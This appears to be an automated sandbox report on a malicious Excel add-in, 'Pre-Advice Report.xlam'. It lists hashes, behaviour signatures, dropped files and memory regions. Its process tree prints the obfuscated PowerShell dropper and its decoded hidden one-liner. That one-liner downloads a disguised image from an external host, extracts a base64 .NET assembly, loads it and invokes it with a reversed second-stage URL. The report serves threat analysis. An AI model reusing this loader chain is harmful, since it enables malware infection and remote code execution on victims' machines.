Analysis

  • max time kernel
    76s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    03/10/2023, 06:16

General

  • Target

    Pre-Advice Report.xlam

  • Size

    651KB

  • MD5

    711f22759352f71502ae383ab4cea435

  • SHA1

    2c766048391043b624a0d9713fa664ec5f151a0e

  • SHA256

    7be0e7463275859563c266e5a7f0d02dd105458764ca49523d19c64811e1f0d5

  • SHA512

    f3f227160b2323288bb355b92339f4d5437a7073e5f500245500d0a2a8101c0474dbb3b5c4107d3e333a2f9686f0f32154398fef7e2ee9a859c0e15927f85daa

  • SSDEEP

    12288:k7kKAv0OQdL/SNqcpJJ/GO7ewecU9EnVrTw10qJdG+NWxkckgUk:k7kKaQJIJJ/Gs3lU+nhTqQ+8xTUk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/622/019/original/rump_new.jpg?1695949870

exe.dropper

https://uploaddeimagens.com.br/images/004/622/019/original/rump_new.jpg?1695949870

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Pre-Advice Report.xlam"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2424
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dertxza.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░2░░░DI░░░Mg░░░v░░░D░░░░░░MQ░░░5░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░cgB1░░░G0░░░c░░░Bf░░░G4░░░ZQB3░░░C4░░░agBw░░░Gc░░░Pw░░░x░░░DY░░░OQ░░░1░░░Dk░░░N░░░░░░5░░░Dg░░░Nw░░░w░░░Cc░░░Ow░░░k░░░Hc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░C░░░░░░PQ░░░g░░░E4░░░ZQB3░░░C0░░░TwBi░░░Go░░░ZQBj░░░HQ░░░I░░░BT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░E4░░░ZQB0░░░C4░░░VwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBC░░░Hk░░░d░░░Bl░░░HM░░░I░░░░░░9░░░C░░░░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░u░░░EQ░░░bwB3░░░G4░░░b░░░Bv░░░GE░░░Z░░░BE░░░GE░░░d░░░Bh░░░Cg░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░KQ░░░7░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░I░░░░░░9░░░C░░░░░░WwBT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░FQ░░░ZQB4░░░HQ░░░LgBF░░░G4░░░YwBv░░░GQ░░░aQBu░░░Gc░░░XQ░░░6░░░Do░░░VQBU░░░EY░░░O░░░░░░u░░░Ec░░░ZQB0░░░FM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BG░░░Gw░░░YQBn░░░C░░░░░░PQ░░░g░░░Cc░░░P░░░░░░8░░░EI░░░QQBT░░░EU░░░Ng░░░0░░░F8░░░UwBU░░░EE░░░UgBU░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BG░░░Gw░░░YQBn░░░C░░░░░░PQ░░░g░░░Cc░░░P░░░░░░8░░░EI░░░QQBT░░░EU░░░Ng░░░0░░░F8░░░RQBO░░░EQ░░░Pg░░░+░░░Cc░░░Ow░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BG░░░Gw░░░YQBn░░░Ck░░░Ow░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░D0░░░I░░░░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C4░░░SQBu░░░GQ░░░ZQB4░░░E8░░░Zg░░░o░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░LQBn░░░GU░░░I░░░░░░w░░░C░░░░░░LQBh░░░G4░░░Z░░░░░░g░░░CQ░░░ZQBu░░░GQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░LQBn░░░HQ░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░r░░░D0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BG░░░Gw░░░YQBn░░░C4░░░T░░░Bl░░░G4░░░ZwB0░░░Gg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░C░░░░░░PQ░░░g░░░CQ░░░ZQBu░░░GQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░LQ░░░g░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░7░░░CQ░░░YgBh░░░HM░░░ZQ░░░2░░░DQ░░░QwBv░░░G0░░░bQBh░░░G4░░░Z░░░░░░g░░░D0░░░I░░░░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C4░░░UwB1░░░GI░░░cwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░L░░░░░░g░░░CQ░░░YgBh░░░HM░░░ZQ░░░2░░░DQ░░░T░░░Bl░░░G4░░░ZwB0░░░Gg░░░KQ░░░7░░░CQ░░░YwBv░░░G0░░░bQBh░░░G4░░░Z░░░BC░░░Hk░░░d░░░Bl░░░HM░░░I░░░░░░9░░░C░░░░░░WwBT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░EM░░░bwBu░░░HY░░░ZQBy░░░HQ░░░XQ░░░6░░░Do░░░RgBy░░░G8░░░bQBC░░░GE░░░cwBl░░░DY░░░N░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░YgBh░░░HM░░░ZQ░░░2░░░DQ░░░QwBv░░░G0░░░bQBh░░░G4░░░Z░░░░░░p░░░Ds░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░I░░░░░░9░░░C░░░░░░WwBT░░░Hk░░░cwB0░░░GU░░░bQ░░░u░░░FI░░░ZQBm░░░Gw░░░ZQBj░░░HQ░░░aQBv░░░G4░░░LgBB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░XQ░░░6░░░Do░░░T░░░Bv░░░GE░░░Z░░░░░░o░░░CQ░░░YwBv░░░G0░░░bQBh░░░G4░░░Z░░░BC░░░Hk░░░d░░░Bl░░░HM░░░KQ░░░7░░░CQ░░░d░░░B5░░░H░░░░░░ZQ░░░g░░░D0░░░I░░░░░░k░░░Gw░░░bwBh░░░GQ░░░ZQBk░░░EE░░░cwBz░░░GU░░░bQBi░░░Gw░░░eQ░░░u░░░Ec░░░ZQB0░░░FQ░░░eQBw░░░GU░░░K░░░░░░n░░░EY░░░aQBi░░░GU░░░cg░░░u░░░Eg░░░bwBt░░░GU░░░Jw░░░p░░░Ds░░░J░░░Bt░░░GU░░░d░░░Bo░░░G8░░░Z░░░░░░g░░░D0░░░I░░░░░░k░░░HQ░░░eQBw░░░GU░░░LgBH░░░GU░░░d░░░BN░░░GU░░░d░░░Bo░░░G8░░░Z░░░░░░o░░░Cc░░░VgBB░░░Ek░░░Jw░░░p░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░Fs░░░bwBi░░░Go░░░ZQBj░░░HQ░░░WwBd░░░F0░░░I░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB3░░░G4░░░ZwBm░░░Gg░░░YQBy░░░C8░░░bQBh░░░Hk░░░LwB0░░░G4░░░ZQB0░░░G4░░░bwBj░░░C0░░░c░░░B3░░░C8░░░egB0░░░C4░░░bwBj░░░C4░░░b░░░Bl░░░HQ░░░cwBv░░░Gg░░░aQBy░░░GE░░░ZgBh░░░HM░░░bwBi░░░Gk░░░awBv░░░GQ░░░YQBy░░░G8░░░b░░░Bv░░░GM░░░Lw░░░v░░░Do░░░cwBw░░░HQ░░░d░░░Bo░░░Cc░░░I░░░░░░s░░░C░░░░░░JwBi░░░G8░░░cwB0░░░GE░░░Jw░░░p░░░Ck░░░';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String($codigo.replace('░░░','A') )) ;powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/622/019/original/rump_new.jpg?1695949870';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wngfhar/may/tnetnoc-pw/zt.oc.letsohirafasobikodaroloc//:sptth' , 'bosta'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2896

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          d1fb755692240814251746afec90f0fd

          SHA1

          24c74ad623e9df87168fd0188a592235b56b22d4

          SHA256

          0a0b83043e77e733c3d03fffde0b67810582abe7b6a5cbab59e5b3f28788fd2a

          SHA512

          0f6c43ee8ce43144134a996cc3d4eb83f58d49fd3b8ceb96b3c7d567017efb4d2412c6095d25c6277efa4baafcd48f5ffe9fda210f47f5415e4ba19390a4ed8a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          ad32af22b1eac9f1861aa1ef75ff65f8

          SHA1

          2ecd800d52e44e0ea01c420c52a922081b08aee7

          SHA256

          edd5b748052a699fce5aff67c8b49a45d5b44df7854019114baeec6854ea3b97

          SHA512

          df8b17c258f77eca012afcb251a93968a23e1cba2f984ccf5a2fa8c268bad428832a53bd33131d70d6cd8e94b77129623ef8ffe505d7a5d30a391c412862ffc6

        • C:\Users\Admin\AppData\Local\Temp\Cab7916.tmp

          Filesize

          61KB

          MD5

          f3441b8572aae8801c04f3060b550443

          SHA1

          4ef0a35436125d6821831ef36c28ffaf196cda15

          SHA256

          6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

          SHA512

          5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

        • C:\Users\Admin\AppData\Local\Temp\Tar7A32.tmp

          Filesize

          163KB

          MD5

          9441737383d21192400eca82fda910ec

          SHA1

          725e0d606a4fc9ba44aa8ffde65bed15e65367e4

          SHA256

          bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

          SHA512

          7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

        • C:\Users\Admin\AppData\Local\Temp\dertxza.vbs

          Filesize

          299KB

          MD5

          0fca862b7e267e54d2388490fcc40f79

          SHA1

          5df8593c11f9c82459696acecd665924b9a5a8de

          SHA256

          32d735a759b94a5a2ceb5758894fce2697dd86181badcb705acce1916f87636b

          SHA512

          83f6277ae95f7b1d9af4cc031967b2721ea982e10fd3aae21159b66e648e210550db5a459bf2aa1df1b954b7bf447ba3748512aafb7ab7b38c60dc81cede19ff

        • C:\Users\Admin\AppData\Local\Temp\dertxza.vbs

          Filesize

          299KB

          MD5

          0fca862b7e267e54d2388490fcc40f79

          SHA1

          5df8593c11f9c82459696acecd665924b9a5a8de

          SHA256

          32d735a759b94a5a2ceb5758894fce2697dd86181badcb705acce1916f87636b

          SHA512

          83f6277ae95f7b1d9af4cc031967b2721ea982e10fd3aae21159b66e648e210550db5a459bf2aa1df1b954b7bf447ba3748512aafb7ab7b38c60dc81cede19ff

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4WBUMN848NWSJ9UYH3KH.temp

          Filesize

          7KB

          MD5

          d39d5d14b3c7e853c8c3fe6b617d567f

          SHA1

          6f169ff46ca4e55f1514dd5768601be87893afd3

          SHA256

          2fdcc5b65b921c2b9d75c4daeaaefa47ac574a4f5e34379966fc18d6370b9230

          SHA512

          b055c53f16ac6db9787b6564fb9236e4757b11ecf0ab9489778774c9e586efd80894868fbbdcf09447d0e78a4fb10cbc065d1b51b3db24f8f2448b95c32092b8

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          d39d5d14b3c7e853c8c3fe6b617d567f

          SHA1

          6f169ff46ca4e55f1514dd5768601be87893afd3

          SHA256

          2fdcc5b65b921c2b9d75c4daeaaefa47ac574a4f5e34379966fc18d6370b9230

          SHA512

          b055c53f16ac6db9787b6564fb9236e4757b11ecf0ab9489778774c9e586efd80894868fbbdcf09447d0e78a4fb10cbc065d1b51b3db24f8f2448b95c32092b8

        • memory/2424-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2424-36-0x000000007216D000-0x0000000072178000-memory.dmp

          Filesize

          44KB

        • memory/2424-5549-0x000000007216D000-0x0000000072178000-memory.dmp

          Filesize

          44KB

        • memory/2424-1-0x000000007216D000-0x0000000072178000-memory.dmp

          Filesize

          44KB

        • memory/2536-30-0x0000000001B70000-0x0000000001BB0000-memory.dmp

          Filesize

          256KB

        • memory/2536-29-0x0000000001B70000-0x0000000001BB0000-memory.dmp

          Filesize

          256KB

        • memory/2536-96-0x0000000001B70000-0x0000000001BB0000-memory.dmp

          Filesize

          256KB

        • memory/2536-28-0x000000006BF10000-0x000000006C4BB000-memory.dmp

          Filesize

          5.7MB

        • memory/2536-41-0x000000006BF10000-0x000000006C4BB000-memory.dmp

          Filesize

          5.7MB

        • memory/2536-27-0x000000006BF10000-0x000000006C4BB000-memory.dmp

          Filesize

          5.7MB

        • memory/2536-52-0x0000000001B70000-0x0000000001BB0000-memory.dmp

          Filesize

          256KB

        • memory/2896-108-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-128-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-39-0x000000006BF10000-0x000000006C4BB000-memory.dmp

          Filesize

          5.7MB

        • memory/2896-97-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-98-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-100-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-102-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-104-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-106-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-38-0x00000000028C0000-0x0000000002900000-memory.dmp

          Filesize

          256KB

        • memory/2896-110-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-112-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-114-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-116-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-118-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-120-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-122-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-124-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-126-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-40-0x00000000028C0000-0x0000000002900000-memory.dmp

          Filesize

          256KB

        • memory/2896-131-0x000000006BF10000-0x000000006C4BB000-memory.dmp

          Filesize

          5.7MB

        • memory/2896-130-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-133-0x00000000028C0000-0x0000000002900000-memory.dmp

          Filesize

          256KB

        • memory/2896-134-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-137-0x00000000028C0000-0x0000000002900000-memory.dmp

          Filesize

          256KB

        • memory/2896-135-0x00000000028C0000-0x0000000002900000-memory.dmp

          Filesize

          256KB

        • memory/2896-138-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-140-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-142-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-144-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-146-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-148-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-150-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-152-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-154-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-156-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-158-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-160-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-162-0x0000000008820000-0x0000000008B3A000-memory.dmp

          Filesize

          3.1MB

        • memory/2896-37-0x000000006BF10000-0x000000006C4BB000-memory.dmp

          Filesize

          5.7MB